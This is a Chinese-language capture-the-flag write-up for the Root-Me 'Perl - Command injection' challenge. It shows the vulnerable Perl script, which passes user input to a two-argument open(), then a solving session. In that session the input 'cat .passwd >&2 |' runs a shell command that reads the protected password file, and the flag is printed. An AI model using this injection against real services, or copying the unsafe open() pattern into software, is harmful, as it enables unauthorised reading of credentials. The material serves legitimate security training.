CTF-rootme 题解之Perl - Command injection

LINK:https://www.root-me.org/en/Challenges/App-Script/Perl-Command-injection

Referrence:http://www.cnblogs.com/chengmo/archive/2010/10/20/1855805.html

　　　　 https://www.cnblogs.com/softidea/p/3965093.html

　　　　 https://github.com/Vinnyz/Root-me-challenge-App-Script

　　　　 http://repository.root-me.org/Programmation/Perl/EN%20-%20Perl%20operators.pdf

SOURCE CODE:

    #!/usr/bin/perl
     
    delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};
    $ENV{'PATH'}='/bin:/usr/bin';
     
    use strict;
    use warnings;
     
    main();
     
    sub main {
        my ($file, $line) = @_;
     
        menu();
        prompt();
     
        while((my $file = <STDIN>)) {
            chomp $file;
     
            process_file($file);
     
            prompt();
        }
    }
     
    sub prompt {
        local $| = 1;
        print ">>> ";
    }
    sub menu {
        print "*************************\n";
        print "* Stat File Service    *\n";
        print "*************************\n";
    }
     
    sub check_read_access {
        my $f = shift;
     
        if(-f $f) {
            my $filemode = (stat($f))[2];
     
            return ($filemode & 4);
        }
     
        return 0;
    }
     
    sub process_file {
        my $file = shift;
        my $line;
        my ($line_count, $char_count, $word_count) = (0,0,0);
     
        $file =~ /(.+)/;
        $file = $1;
        if(!open(F, $file)) {
            die "[-] Can't open $file: $!\n";
        }
     
     
        while(($line = <F>)) {
            $line_count++;
            $char_count += length $line;
            $word_count += scalar(split/\W+/, $line);
        }
     
        print "~~~ Statistics for \"$file\" ~~~\n";
        print "Lines: $line_count\n";
        print "Words: $word_count\n";
        print "Chars: $char_count\n";
     
        close F;
    }

Solution:

app-script-ch7@challenge02:~$ ./setuid-wrapper 
*************************
* Stat File Service    *
*************************
>>> ch7.pl
~~~ Statistics for "ch7.pl" ~~~
Lines: 73
Words: 164
Chars: 1186
>>> cat .passwd >&2 |                                
PerlCanDoBetterThanYouThink
~~~ Statistics for "cat .passwd >&2 |" ~~~
Lines: 0
Words: 0
Chars: 0
app-script-ch7@challenge02:~$ ./setuid-wrapper 
*************************
* Stat File Service    *
*************************
>>> cat .passwd
[-] Can't open cat .passwd: No such file or directory

&2等同于1>&2命令，表示将shell命令执行得到的正确结果作为错误信息输出到终端，将cat .passwd这个命令的结果作为文件名传入会返回错误结果，这样就会将.passwd的文件内容替换"Can't open cat .passwd: No such file or directory"这条错误信息打印出来得到本题答案。